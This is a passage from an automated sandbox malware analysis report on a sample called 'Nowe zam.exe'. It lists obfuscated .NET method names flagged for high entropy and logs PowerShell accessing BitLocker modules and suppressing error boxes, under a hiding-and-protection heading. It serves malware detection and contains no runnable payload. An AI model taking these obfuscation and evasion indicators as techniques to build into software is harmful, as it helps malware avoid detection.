                  Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, PShm6tZisUSUk72SkT.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Cy03cimoIc', 'slg3KcIfaj', 'BiH3zAlbni', 'TFgBmake2h', 'u9rBnarXNb', 'SsiB3HIi7m', 'EXqBBYUdsM', 'LgIrsCojaQIcOqADavQ'
                  Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, zjHVUkuQsImgZBRnqb.csHigh entropy of concatenated method names: 'umylfe5Idq', 'u2NlFhDxiD', 'VKvlX5njoG', 'hWlljOM8QP', 'pYylb2qTox', 'msBlecMZy4', 'T1KlwxHHkV', 'qlSlgobuFp', 'mdLlcYMOOZ', 'nn3lKUbTvL'
                  Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, S7gABjgHov821TLWvu.csHigh entropy of concatenated method names: 'bHnQgSy9mH', 'MvgQKMyJGc', 'RW4PmZmsO0', 'YtXPnwVcqf', 'DfmQdbKRDX', 'NY5QNtiGym', 'YanQUdjel3', 'MPaQfvugv7', 'unDQFkMsWa', 'HbrQXGUhdw'
                  Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, LV1AeIfEmwDFsqTsKb.csHigh entropy of concatenated method names: 'vUOpXli7j', 'rFsJ9Y0as', 'PswLEZ3o4', 'sYLsPn7ib', 'Nbk94UK3I', 'fZ61hSw0O', 'hEpn5XX8R05N7ZrcIH', 'AjHlD7OX9Uk3fqn2jk', 'PgbPTgsxA', 'BlsTqpRbr'
                  Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, jP28k7dYxlc8sWXOGn.csHigh entropy of concatenated method names: 'IdA6trv7kp', 'ek56sX2x9l', 'aGvHv6hTwd', 'gCaHueRYNA', 'zuOHS4KpRn', 'Tw0HxCfUYU', 'tWyH4scVRi', 'LLdHGddyn5', 'rjIHqsi7FF', 'WjWH8mS2Zc'
                  Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, ve1mEgYtFhYstSIOtG.csHigh entropy of concatenated method names: 'Q3uIYpj0h1', 'vDeIlp6A7I', 'L5OI6VFfeP', 'fy4IOZvb8Z', 'WS7IAemN5R', 'QfY6bpeLsD', 'NS26ekLwbr', 'OWY6wfGIp1', 'nsE6gyjVib', 'J7d6csCif9'
                  Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, d8gCKMznxhO9qoF44S.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vQBaZxqKX7', 'AroaE5G6dk', 'J2Xayf2spx', 'mEDaQFu2B8', 'my0aPE6Kpy', 'RObaaMksMv', 'CscaTldfcc'
                  Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, oWOXDZtVjZjPbnWG28.csHigh entropy of concatenated method names: 'zBxPkmZlxb', 'GTYPh4OQli', 'daJPvyJN3j', 'TIQPuudPyU', 'il4Pf74oY2', 'oIEPSD6ZXE', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, pX2IbuFtpCIMOGeXEB.csHigh entropy of concatenated method names: 'tn0PClOqph', 'C5PPlxvOlN', 'af6PHoGfdK', 'AD6P6gkL6p', 'eJgPI10A5P', 'Pr8PONHjYZ', 'yWWPAF4d5H', 'abeP2dSLFf', 'pGWPWnF9vq', 'm51P0LF1m5'
                  Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, aXocyHbAIWldAgwAaR.csHigh entropy of concatenated method names: 'q0OOC9Qiej', 'uiWOHTN7Vg', 'bejOI7cKZJ', 'ynEIKu1UfH', 'PQ1Iz0I9rI', 'zq5OmJrJLf', 'zKCOnht54b', 'kyDO3VPbT5', 'm8GOBREP1u', 'ywTO5maALF'
                  Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, lmkKaGxfLkOet2kU7o.csHigh entropy of concatenated method names: 'FKFnOJ6GEN', 'X7lnATk8EF', 'u0lnWHe1uh', 'kIbn0yZt87', 'HNvnEYtsNu', 'HaBnyn4Pks', 'k2L2PS2VraM57t5UPv', 'XkRTBDH9ICZLxrJ52K', 'oIInnSLSvH', 'ihpnBwaaDV'
                  Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, TYO6ikvbM2eiVN2xmR.csHigh entropy of concatenated method names: 'Dispose', 'EKanc7m3mm', 'aoV3hAg6X4', 'Ii3RRNihd1', 'z4bnKlE1aT', 'UdInzqpiXm', 'ProcessDialogKey', 'xYS3m6G9id', 'Mo73nf480Y', 'M9y33QUyeQ'
                  Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, B9bVDOqMLYYZuBGPwde.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fa5Tfepal0', 'uTdTFXb8oX', 'hNYTXu0WcR', 'TXJTjwWoie', 'BumTbFy44i', 'p1uTeZHuwu', 'osiTwV5jW3'
                  Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, VauhTkUpD5HOgi095m.csHigh entropy of concatenated method names: 'EX0E830vMj', 'NatENTc3lv', 'IS8Ef0YKCk', 'FKuEFNXTFW', 'kY7Ehh9I71', 'yjNEvfR8Et', 'OUSEuvsCjJ', 'fTyESq7gDB', 'dMmExR4w5p', 'sNBE4AXU40'
                  Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, ltkwIoqy7ggOna0Y7kF.csHigh entropy of concatenated method names: 'zCVa7cNILG', 'emhaDIxYxE', 'Vw8apRA4Tf', 'e6QaJFv3Tt', 'nLjatPxarg', 'jIraL5tmxh', 'QugasEj5KT', 'fvZarOZGit', 'rwda9AL2LA', 'ylOa1yEw6P'
                  Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, GKlt7LSDLcMl9C9ZIn.csHigh entropy of concatenated method names: 'WwJQW58i72', 'iNPQ0LoPNv', 'ToString', 'K7uQCCLfDT', 'heHQlVHRs1', 'vsPQHlag2O', 'FH3Q6rCqPM', 'Gb1QIpsD6j', 'CB4QOMHXS3', 'F7dQAH3kNR'
                  Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, W3VlPCLflixB2rp71i.csHigh entropy of concatenated method names: 'YOcanbCDNA', 'm5waBRJufT', 'RrCa55I8ei', 'M6XaCsx5na', 'Ul4al8RVB6', 'ACLa6Qxe1u', 'pTPaIFO6or', 'ASPPwDdXx1', 'joxPgR606P', 'IWRPcw3j9I'
                  Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, aORc8Fn3Nvyrgg7Afe.csHigh entropy of concatenated method names: 'E72O7h6cPg', 'WitODyLeBc', 'ec6OpyPWgV', 'UiFOJuTWVf', 'eP1OtlFkjx', 'VKFOLcG00q', 'dLjOs7xVaT', 'EJKOr8cpUM', 'NNdO9GvRov', 'iLAO13cCw4'
                  Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, djFCTLAxtxUimQBj8F.csHigh entropy of concatenated method names: 'ToString', 'Pj9ydSuoZ5', 'd8wyhOY73G', 'i8ayvnUU6l', 'W58yuAt0Ow', 'lIKySqYDgq', 'nBkyxrOg84', 'mX1y4frJVM', 'QMryGsSCIl', 'L1iyqT0GNB'
                  Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, h2RdXWmKrOcA4lBQp9.csHigh entropy of concatenated method names: 'c7wHJddNWH', 'GEbHLEGy41', 'K13HrIIQaU', 'le8H9QNLSO', 'JebHEl4Xtc', 'Ps1HyvBTCQ', 'wJ0HQHVAud', 'HyLHPAp6gl', 'qfgHa77S9N', 'LFgHTrBeye'
                  Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, rW4ijJCasbbw09ngCX.csHigh entropy of concatenated method names: 'pbqBYOd9Iu', 'aPjBCvtV0F', 'hI2BlCQa2D', 'vKnBHYQ4WL', 'WCyB65JiWS', 'zXrBIvKloA', 'yJJBO4nFv8', 'UJrBAGAn0V', 'j43B2FuBWa', 'inwBW4qxTM'
                  Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, gf5RTS9fRSkJBoaOVI.csHigh entropy of concatenated method names: 'O68ZrAeV1r', 'hodZ9oRchi', 'YvgZkPshdk', 'bdpZhNUTSS', 'm7YZui5wWL', 'VygZSuhfqK', 'iyAZ4QtGIE', 'monZGBOj3I', 'QdEZ8QjMOD', 'DGcZd5iWS3'
                  Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, PShm6tZisUSUk72SkT.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Cy03cimoIc', 'slg3KcIfaj', 'BiH3zAlbni', 'TFgBmake2h', 'u9rBnarXNb', 'SsiB3HIi7m', 'EXqBBYUdsM', 'LgIrsCojaQIcOqADavQ'
                  Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, zjHVUkuQsImgZBRnqb.csHigh entropy of concatenated method names: 'umylfe5Idq', 'u2NlFhDxiD', 'VKvlX5njoG', 'hWlljOM8QP', 'pYylb2qTox', 'msBlecMZy4', 'T1KlwxHHkV', 'qlSlgobuFp', 'mdLlcYMOOZ', 'nn3lKUbTvL'
                  Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, S7gABjgHov821TLWvu.csHigh entropy of concatenated method names: 'bHnQgSy9mH', 'MvgQKMyJGc', 'RW4PmZmsO0', 'YtXPnwVcqf', 'DfmQdbKRDX', 'NY5QNtiGym', 'YanQUdjel3', 'MPaQfvugv7', 'unDQFkMsWa', 'HbrQXGUhdw'
                  Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, LV1AeIfEmwDFsqTsKb.csHigh entropy of concatenated method names: 'vUOpXli7j', 'rFsJ9Y0as', 'PswLEZ3o4', 'sYLsPn7ib', 'Nbk94UK3I', 'fZ61hSw0O', 'hEpn5XX8R05N7ZrcIH', 'AjHlD7OX9Uk3fqn2jk', 'PgbPTgsxA', 'BlsTqpRbr'
                  Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, jP28k7dYxlc8sWXOGn.csHigh entropy of concatenated method names: 'IdA6trv7kp', 'ek56sX2x9l', 'aGvHv6hTwd', 'gCaHueRYNA', 'zuOHS4KpRn', 'Tw0HxCfUYU', 'tWyH4scVRi', 'LLdHGddyn5', 'rjIHqsi7FF', 'WjWH8mS2Zc'
                  Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, ve1mEgYtFhYstSIOtG.csHigh entropy of concatenated method names: 'Q3uIYpj0h1', 'vDeIlp6A7I', 'L5OI6VFfeP', 'fy4IOZvb8Z', 'WS7IAemN5R', 'QfY6bpeLsD', 'NS26ekLwbr', 'OWY6wfGIp1', 'nsE6gyjVib', 'J7d6csCif9'
                  Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, d8gCKMznxhO9qoF44S.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vQBaZxqKX7', 'AroaE5G6dk', 'J2Xayf2spx', 'mEDaQFu2B8', 'my0aPE6Kpy', 'RObaaMksMv', 'CscaTldfcc'
                  Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, oWOXDZtVjZjPbnWG28.csHigh entropy of concatenated method names: 'zBxPkmZlxb', 'GTYPh4OQli', 'daJPvyJN3j', 'TIQPuudPyU', 'il4Pf74oY2', 'oIEPSD6ZXE', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, pX2IbuFtpCIMOGeXEB.csHigh entropy of concatenated method names: 'tn0PClOqph', 'C5PPlxvOlN', 'af6PHoGfdK', 'AD6P6gkL6p', 'eJgPI10A5P', 'Pr8PONHjYZ', 'yWWPAF4d5H', 'abeP2dSLFf', 'pGWPWnF9vq', 'm51P0LF1m5'
                  Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, aXocyHbAIWldAgwAaR.csHigh entropy of concatenated method names: 'q0OOC9Qiej', 'uiWOHTN7Vg', 'bejOI7cKZJ', 'ynEIKu1UfH', 'PQ1Iz0I9rI', 'zq5OmJrJLf', 'zKCOnht54b', 'kyDO3VPbT5', 'm8GOBREP1u', 'ywTO5maALF'
                  Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, lmkKaGxfLkOet2kU7o.csHigh entropy of concatenated method names: 'FKFnOJ6GEN', 'X7lnATk8EF', 'u0lnWHe1uh', 'kIbn0yZt87', 'HNvnEYtsNu', 'HaBnyn4Pks', 'k2L2PS2VraM57t5UPv', 'XkRTBDH9ICZLxrJ52K', 'oIInnSLSvH', 'ihpnBwaaDV'
                  Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, TYO6ikvbM2eiVN2xmR.csHigh entropy of concatenated method names: 'Dispose', 'EKanc7m3mm', 'aoV3hAg6X4', 'Ii3RRNihd1', 'z4bnKlE1aT', 'UdInzqpiXm', 'ProcessDialogKey', 'xYS3m6G9id', 'Mo73nf480Y', 'M9y33QUyeQ'
                  Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, B9bVDOqMLYYZuBGPwde.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fa5Tfepal0', 'uTdTFXb8oX', 'hNYTXu0WcR', 'TXJTjwWoie', 'BumTbFy44i', 'p1uTeZHuwu', 'osiTwV5jW3'
                  Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, VauhTkUpD5HOgi095m.csHigh entropy of concatenated method names: 'EX0E830vMj', 'NatENTc3lv', 'IS8Ef0YKCk', 'FKuEFNXTFW', 'kY7Ehh9I71', 'yjNEvfR8Et', 'OUSEuvsCjJ', 'fTyESq7gDB', 'dMmExR4w5p', 'sNBE4AXU40'
                  Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, ltkwIoqy7ggOna0Y7kF.csHigh entropy of concatenated method names: 'zCVa7cNILG', 'emhaDIxYxE', 'Vw8apRA4Tf', 'e6QaJFv3Tt', 'nLjatPxarg', 'jIraL5tmxh', 'QugasEj5KT', 'fvZarOZGit', 'rwda9AL2LA', 'ylOa1yEw6P'
                  Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, GKlt7LSDLcMl9C9ZIn.csHigh entropy of concatenated method names: 'WwJQW58i72', 'iNPQ0LoPNv', 'ToString', 'K7uQCCLfDT', 'heHQlVHRs1', 'vsPQHlag2O', 'FH3Q6rCqPM', 'Gb1QIpsD6j', 'CB4QOMHXS3', 'F7dQAH3kNR'
                  Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, W3VlPCLflixB2rp71i.csHigh entropy of concatenated method names: 'YOcanbCDNA', 'm5waBRJufT', 'RrCa55I8ei', 'M6XaCsx5na', 'Ul4al8RVB6', 'ACLa6Qxe1u', 'pTPaIFO6or', 'ASPPwDdXx1', 'joxPgR606P', 'IWRPcw3j9I'
                  Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, aORc8Fn3Nvyrgg7Afe.csHigh entropy of concatenated method names: 'E72O7h6cPg', 'WitODyLeBc', 'ec6OpyPWgV', 'UiFOJuTWVf', 'eP1OtlFkjx', 'VKFOLcG00q', 'dLjOs7xVaT', 'EJKOr8cpUM', 'NNdO9GvRov', 'iLAO13cCw4'
                  Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, djFCTLAxtxUimQBj8F.csHigh entropy of concatenated method names: 'ToString', 'Pj9ydSuoZ5', 'd8wyhOY73G', 'i8ayvnUU6l', 'W58yuAt0Ow', 'lIKySqYDgq', 'nBkyxrOg84', 'mX1y4frJVM', 'QMryGsSCIl', 'L1iyqT0GNB'

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
